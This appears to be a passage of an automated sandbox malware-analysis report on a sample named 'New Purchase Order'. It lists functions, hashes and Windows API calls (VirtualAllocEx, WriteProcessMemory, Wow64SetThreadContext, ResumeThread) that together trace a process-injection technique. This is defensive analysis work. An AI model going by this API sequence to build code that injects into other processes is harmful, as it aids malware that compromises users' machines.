                • Opcode ID: 972404a5dd1a41b6e17a4a34e2484b62fe1225b1e8fa74c678aba04049c697f6
                • Instruction ID: b817201371103301b76ee4ff672615a665a7582196ef6e566d1b5d0125c5a5a3
                • Opcode Fuzzy Hash: 972404a5dd1a41b6e17a4a34e2484b62fe1225b1e8fa74c678aba04049c697f6
                • Instruction Fuzzy Hash: 73812570A00B058FD7A4DF2AD44475ABBF1FF88308F008A2DE54AD7A50DB75E949CB90
                Function 02CF590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 219 2cf590c-2cf5916 220 2cf5918-2cf59d9 CreateActCtxA 219->220 222 2cf59db-2cf59e1 220->222 223 2cf59e2-2cf5a3c 220->223 222->223 230 2cf5a3e-2cf5a41 223->230 231 2cf5a4b-2cf5a4f 223->231 230->231 232 2cf5a51-2cf5a5d 231->232 233 2cf5a60-2cf5a90 231->233 232->233 237 2cf5a42-2cf5a44 233->237 238 2cf5a92-2cf5b14 233->238 237->231
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 02CF59C9
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 86ef91cf994de33224081b27c82e55ddda8056772f44cb87bcf0d075cfc9fccd
                • Instruction ID: f079bb22bad2509110679cf44a30838587584a253a0417d316cef10a9d2fbe90
                • Opcode Fuzzy Hash: 86ef91cf994de33224081b27c82e55ddda8056772f44cb87bcf0d075cfc9fccd
                • Instruction Fuzzy Hash: 6A410370C0071DCBEB64CFA9C98479EBBB5BF89714F608069D508AB251DB716949CF90
                Function 02CF44E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 240 2cf44e0-2cf59d9 CreateActCtxA 243 2cf59db-2cf59e1 240->243 244 2cf59e2-2cf5a3c 240->244 243->244 251 2cf5a3e-2cf5a41 244->251 252 2cf5a4b-2cf5a4f 244->252 251->252 253 2cf5a51-2cf5a5d 252->253 254 2cf5a60-2cf5a90 252->254 253->254 258 2cf5a42-2cf5a44 254->258 259 2cf5a92-2cf5b14 254->259 258->252
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 02CF59C9
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 8a5bb5a3c9f6fa55a17ef775526eb89c043d77fb839be5e96cfaab19bf920262
                • Instruction ID: 5be341e8a6f72f232b0506166771561e575fef00928c2f2de69251b48c9dbe16
                • Opcode Fuzzy Hash: 8a5bb5a3c9f6fa55a17ef775526eb89c043d77fb839be5e96cfaab19bf920262
                • Instruction Fuzzy Hash: 6441F270C0071DCBEF64CFA9C98479EBBB5BF88704F60806AD509AB251DB716949CF90
                Function 0808C539 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 261 808c539-808c58e 263 808c59e-808c5dd WriteProcessMemory 261->263 264 808c590-808c59c 261->264 266 808c5df-808c5e5 263->266 267 808c5e6-808c616 263->267 264->263 266->267
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0808C5D0
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 9cdd1b194cc4128ba0b7bc796b6860d36667af99e9fa12b8dec528d34a92a5a8
                • Instruction ID: b57beca36386331fbdc0c4930ab8b717999daa5faf1594c1b8949f4542f60777
                • Opcode Fuzzy Hash: 9cdd1b194cc4128ba0b7bc796b6860d36667af99e9fa12b8dec528d34a92a5a8
                • Instruction Fuzzy Hash: 97210476900349DFDF50DFA9C881BDEBBF1BF48320F10842AE959A7240C7789A55CBA5
                Function 0808BF68 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 271 808bf68-808bfbb 274 808bfcb-808bffb Wow64SetThreadContext 271->274 275 808bfbd-808bfc9 271->275 277 808bffd-808c003 274->277 278 808c004-808c034 274->278 275->274 277->278
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0808BFEE
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 9977cc4b4b3b55d71c5b4224a824696fbbe371e693becacd218f8f9de70e120f
                • Instruction ID: a4b4c4caa84c89564f577243dafc1dfd8b5c6b2d5ec58c7de85444f21a079918
                • Opcode Fuzzy Hash: 9977cc4b4b3b55d71c5b4224a824696fbbe371e693becacd218f8f9de70e120f
                • Instruction Fuzzy Hash: 4E2159719003099FDB20DFAAC4817EEBBF5EF48324F108429D559A7241CB78A585CFA5
                Function 0808C540 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 282 808c540-808c58e 284 808c59e-808c5dd WriteProcessMemory 282->284 285 808c590-808c59c 282->285 287 808c5df-808c5e5 284->287 288 808c5e6-808c616 284->288 285->284 287->288
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0808C5D0
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 8e0d4af78c38a93ff93758bce42e2e1ec907adb3612cd9145bbb0cbe8cdafe65
                • Instruction ID: 9de831d16040976cc46a5100b552db0e814fb2f5af16852591a5777b84ed95af
                • Opcode Fuzzy Hash: 8e0d4af78c38a93ff93758bce42e2e1ec907adb3612cd9145bbb0cbe8cdafe65
                • Instruction Fuzzy Hash: D9210471900349DFDF50DFA9C881BDEBBF5BF48310F108429E959A7240C778A954CBA4
                Function 0808C628 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 292 808c628-808c6bd ReadProcessMemory 296 808c6bf-808c6c5 292->296 297 808c6c6-808c6f6 292->297 296->297
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0808C6B0
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: ab020e9b65dac78a9a0ae42aa3500b52c6ed020085d37a4695a5f017f40f3e44
                • Instruction ID: 05b838a9e35fe21df123511ff119e59de0704624b9bc1c8a298a5b9a3b13e7ed
                • Opcode Fuzzy Hash: ab020e9b65dac78a9a0ae42aa3500b52c6ed020085d37a4695a5f017f40f3e44
                • Instruction Fuzzy Hash: 5E2127718013499FDB10DFAAC881BEEBBF5FF48320F10842AE559A7250D774A950CBA5
                Function 02CFD780 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 301 2cfd780-2cfd786 302 2cfd788-2cfd81c DuplicateHandle 301->302 303 2cfd81e-2cfd824 302->303 304 2cfd825-2cfd842 302->304 303->304
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02CFD80F
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 605f8115ce532b064e207878640a50fb1d38986cd90ae3bede65b7d2915259c0
                • Instruction ID: 13c7ed47c3b22aba83a1d27a974655561ce7aa15d0880cc2beed61918e44bb59
                • Opcode Fuzzy Hash: 605f8115ce532b064e207878640a50fb1d38986cd90ae3bede65b7d2915259c0
                • Instruction Fuzzy Hash: F421F4B5900248DFDB50CFAAD984ADEBFF4FB48720F14801AE915A3210D374A950CFA5
                Function 0808BF70 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 307 808bf70-808bfbb 309 808bfcb-808bffb Wow64SetThreadContext 307->309 310 808bfbd-808bfc9 307->310 312 808bffd-808c003 309->312 313 808c004-808c034 309->313 310->309 312->313
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0808BFEE
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: d1007235e9bbf31cb9e619b9a019b97dc4533ef7059ac21778a864fa883a34b2
                • Instruction ID: e56cc4366dcadf2c4bd63dca3c6c806d0390f6886c14c1d4aebab2225a7d64ae
                • Opcode Fuzzy Hash: d1007235e9bbf31cb9e619b9a019b97dc4533ef7059ac21778a864fa883a34b2
                • Instruction Fuzzy Hash: 1E2138719003098FDB50DFAAC4857AEBBF5EF88324F148429D559A7241CB78A944CFA5
                Function 0808C630 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 317 808c630-808c6bd ReadProcessMemory 320 808c6bf-808c6c5 317->320 321 808c6c6-808c6f6 317->321 320->321
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0808C6B0
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: 0705e5e80031d5c5448ff2cdc1156cf19bd329a82be6c50b6f4872652e3a96c1
                • Instruction ID: ef5d8be316d935edf40389158208d0fc2a9b2d6069cb4c38e3812ad308e43820
                • Opcode Fuzzy Hash: 0705e5e80031d5c5448ff2cdc1156cf19bd329a82be6c50b6f4872652e3a96c1
                • Instruction Fuzzy Hash: B32116718003499FDB10DFAAC881BDEBBF5FF48320F10842AE559A7250C7789950CBA5
                Function 02CFD788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 325 2cfd788-2cfd81c DuplicateHandle 326 2cfd81e-2cfd824 325->326 327 2cfd825-2cfd842 325->327 326->327
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02CFD80F
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: d7ba2f938ac1b67b0a5b4b064e727d74583a2ccf5b02a4ba0752597dab9755fd
                • Instruction ID: 9179608ad432e8980f1247d179a6ef53b5dd8574fe733877e0627ecf44dcf7ff
                • Opcode Fuzzy Hash: d7ba2f938ac1b67b0a5b4b064e727d74583a2ccf5b02a4ba0752597dab9755fd
                • Instruction Fuzzy Hash: ED21E3B59002499FDB50CF9AD984ADEBBF4FB48320F14841AE915A3210D374A954CFA4
                Function 0808C479 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0808C4EE
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: f9973594ec4a0da60c1a3a0e50304589b4fd53444814a1f3b71cfcbd2b5112de
                • Instruction ID: 36ba4daa10d670d34d0895fe92572bd8d070d02b2f3b8836d795e3ff814be7bd
                • Opcode Fuzzy Hash: f9973594ec4a0da60c1a3a0e50304589b4fd53444814a1f3b71cfcbd2b5112de
                • Instruction Fuzzy Hash: EB1164728002499FDF10DFAAC841BEFBBF5EF88320F10841AE519A7210CB75A590CFA1
                Function 0808BEB8 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: 1f2dd2494b7086210ce9b92b6037092dc237b069427003e78e2e5610dbbf1f0f
                • Instruction ID: a4d55000edbae4beb711547b88d6e886465c871555e089eb3d8e187802d375b7
                • Opcode Fuzzy Hash: 1f2dd2494b7086210ce9b92b6037092dc237b069427003e78e2e5610dbbf1f0f
                • Instruction Fuzzy Hash: 8A1146B59013498FDB20DFAAC4457EEFBF5EF88324F208819D559A7240CBB9A540CFA5
                Function 0808C480 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0808C4EE
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 4cfb3b845c1724ff46841a9f9eac77a0656fb215b7bb01cfa2e4e50ab98e4c1e
                • Instruction ID: 3a63f23499a023e053c3a359f0001f67916c712b612a87f131e03665f27f5b4e
                • Opcode Fuzzy Hash: 4cfb3b845c1724ff46841a9f9eac77a0656fb215b7bb01cfa2e4e50ab98e4c1e
                • Instruction Fuzzy Hash: 72115672800249DFDF10DFAAC844BDFBBF5EF88320F108419E519A7250CB75A550CBA4
                Function 074D1148 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 074D11AD
                Memory Dump Source
                • Source File: 00000000.00000002.2169997628.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_74d0000_New Purchase Order.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: ec044823261c9f1008f868c30e9fce62732cc11193ddd3d23d09af2f933f52db
                • Instruction ID: 96ecc40ac3a6acd111d225b0b2e9bb0aae71a9d602275e96d21abe48f4637ec0
                • Opcode Fuzzy Hash: ec044823261c9f1008f868c30e9fce62732cc11193ddd3d23d09af2f933f52db
                • Instruction Fuzzy Hash: AA11F5B58003499FDB10DF99D985BEFFBF8EB48320F10841AE958A7210D375A994CFA5
                Function 0808BEC0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: a8d58fc5ce0d9d74a08d7381ec659499da968b3ece0338368fdc035a866c87be
                • Instruction ID: 70ce2e090ea59105a1f307475c8d09057c40981aa550101299e5b78dde75e534
                • Opcode Fuzzy Hash: a8d58fc5ce0d9d74a08d7381ec659499da968b3ece0338368fdc035a866c87be
                • Instruction Fuzzy Hash: D51125B19003498FDB20DFAAC4457AEFBF5AF88624F248419D559A7240CBB9A940CFA5
                Function 02CFB498 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 02CFB4FE
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: cc10220d235a9c0290c753c46d2e3d1c0b3277213798311adc64bee0be3c8e32
                • Instruction ID: 2707bfd5e293d7ba605a449e733a3cef2dcc387610e5737ba599c65635bdafc7
                • Opcode Fuzzy Hash: cc10220d235a9c0290c753c46d2e3d1c0b3277213798311adc64bee0be3c8e32
                • Instruction Fuzzy Hash: AB1102B5C002498FCB50CF9AC544BDEFBF4AB88328F10841AD519A7210D379A545CFA5
                Function 074D1150 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 074D11AD
                Memory Dump Source
                • Source File: 00000000.00000002.2169997628.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_74d0000_New Purchase Order.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 252d9f507a9f5b36410bb9e662590d8b70b7c5b890d7d88fb9574ac20a09a546
                • Instruction ID: 5165aef54a3d2ef863b6d409fa7673678a1161167607463f4911e60324c5c4c8
                • Opcode Fuzzy Hash: 252d9f507a9f5b36410bb9e662590d8b70b7c5b890d7d88fb9574ac20a09a546
                • Instruction Fuzzy Hash: 5311D3B58003499FDB10DF9AD985BDEFBF8EB48320F10841AD958A7210C3B5A954CFA5
                Function 0130D1FC Relevance: .1, Instructions: 76COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2162134526.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_130d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d1bc6e2dab3e5d67ece6a28f788284f8b4a298ecb1ddeea2d24536925260fd74
                • Instruction ID: 28f503d3474ee66e2a06bff7bbfc78afec5c9a0fb5b1e95b6de8e4a745e04b67
                • Opcode Fuzzy Hash: d1bc6e2dab3e5d67ece6a28f788284f8b4a298ecb1ddeea2d24536925260fd74
                • Instruction Fuzzy Hash: EB21F772504244DFDB06DF94D9D0B26BFE9FB84328F208569E9050A296C376D416CB61
                Function 0130D4C4 Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2162134526.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_130d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 51341f02d9a5ef541ebd45b762e8e166834c1f266f57049cc533cef4f6dd024d
                • Instruction ID: ece64bbdece46e1803ad351235dfa639d3367396b7ffbda4d17a16bed33fe32b
                • Opcode Fuzzy Hash: 51341f02d9a5ef541ebd45b762e8e166834c1f266f57049cc533cef4f6dd024d
                • Instruction Fuzzy Hash: 5D210372504244EFDB06DF98D9D0B26BFE5FB8831CF20C569ED090B696C336D456CAA1
                Function 0131D1D4 Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2162244026.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_131d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b10aa66ac9a66a195026744ab78b766ecc735fa7d7c90c3e8a96a75688920e72
                • Instruction ID: 624d9b2a76cd5c09a77560f283ac290cc36dbf2914d8bcf0f3b30153c191390e
                • Opcode Fuzzy Hash: b10aa66ac9a66a195026744ab78b766ecc735fa7d7c90c3e8a96a75688920e72
                • Instruction Fuzzy Hash: 4F214671504304EFDB09DF94D9C8B66BBA5FB89328F20C66DE9094B25AC37AD407CA61
                Function 0131D01C Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2162244026.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_131d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f3ace419dac924778cba0747cb7f5ca89f1adf29dcc16d73d5bb315283fd02c2
                • Instruction ID: d41dc04530d4c1df857aeb6bb8a6e7528e79bab3b219f356aad10c1f28b73dca
                • Opcode Fuzzy Hash: f3ace419dac924778cba0747cb7f5ca89f1adf29dcc16d73d5bb315283fd02c2
                • Instruction Fuzzy Hash: FA214275604204EFCB18DF58D9C8B26BB65FB85318F20C56DD90A0B25AC33AD407CA61
                Function 0130D1F7 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2162134526.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_130d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                • Instruction ID: 7fab6eb774afc9677f9be3630eb0315380cb816680a0abebbf77d6db6a872202
                • Opcode Fuzzy Hash: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                • Instruction Fuzzy Hash: B221DF76404280CFCB06CF84D9C4B16BFB2FB84324F24C1A9DC080B296C33AD426CBA1
                Function 0130D4BF Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2162134526.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_130d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                • Instruction ID: e1fb4bd84ba45b8ab33a5fcfed0f29ea18d0e68a160812f16448bed1ade22cd7
                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                • Instruction Fuzzy Hash: C711AF76504284CFCB16CF54D5C4B16BFB1FB88318F24C6A9DC490B696C33AD45ACBA1
                Function 0131D017 Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2162244026.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_131d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction ID: 7ba5fc137199e0882bf67474512839df972e5d836ade73388e2eddf3193b6a63
                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction Fuzzy Hash: 1111D075504280CFCB16CF54D5C4B15FF61FB45318F24C6A9D8094B65AC33BD44ACB62
                Function 0131D1CF Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2162244026.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_131d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction ID: f741481941c6d667868f6e08294c482d49779ae9731e9a56ae6337f17df40b2d
                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction Fuzzy Hash: 3011BB75504280DFCB06CF54C5C4B55BBB1FB85228F24C6A9D8494B6AAC33AD40ACB61

                Non-executed Functions

                Function 08089BB8 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 02a7830a359cc05b5c773806eed00866a3cc6141c9f71068e45e87051fefae5c
                • Instruction ID: ca897d0b1e61e8a95443c1274a8dd5fd70a5fc883887db641565f774e191b152
                • Opcode Fuzzy Hash: 02a7830a359cc05b5c773806eed00866a3cc6141c9f71068e45e87051fefae5c
                • Instruction Fuzzy Hash: E8E1FA74E00259CFDB14EF99C580AAEBBF2BF49305F248269D454A7356D730A982CF60
                Function 08089FF0 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3d8bffe2379b0a92c498671ff856dd7c6c76554635a3b21960037b50c7d4d1c6
                • Instruction ID: dd4063350e51e98a02447377b3175cf7fa3a613e3538cee93bdf39d3a8aea052
                • Opcode Fuzzy Hash: 3d8bffe2379b0a92c498671ff856dd7c6c76554635a3b21960037b50c7d4d1c6
                • Instruction Fuzzy Hash: ECE1F974E00269CFDB14DF99C580AAEBBF2BF89305F24826AD454A7355D730AD82CF61
                Function 0808C048 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 502ab39dbc27e44e0dd7320ded202484f78feee77982f8a96fe65cc995175f70
                • Instruction ID: f65526a0d45c03ea863dad269f7c4899939420c0b16e0656d9795a981bb2bf1e
                • Opcode Fuzzy Hash: 502ab39dbc27e44e0dd7320ded202484f78feee77982f8a96fe65cc995175f70
                • Instruction Fuzzy Hash: 01E1F674E00259CFDB54DFA9C580AAEFBF2BF89305F248269D454AB355D730A982CF60
                Function 0808A428 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: edc37367141b6357a0cc8511d5ed55f1ca1119adef6c2864b604816eb8ce563d
                • Instruction ID: 22f6a5d3a403fd599ce76d47a29d6db52a102ef0dd922d79b03cabbdf8e5d313
                • Opcode Fuzzy Hash: edc37367141b6357a0cc8511d5ed55f1ca1119adef6c2864b604816eb8ce563d
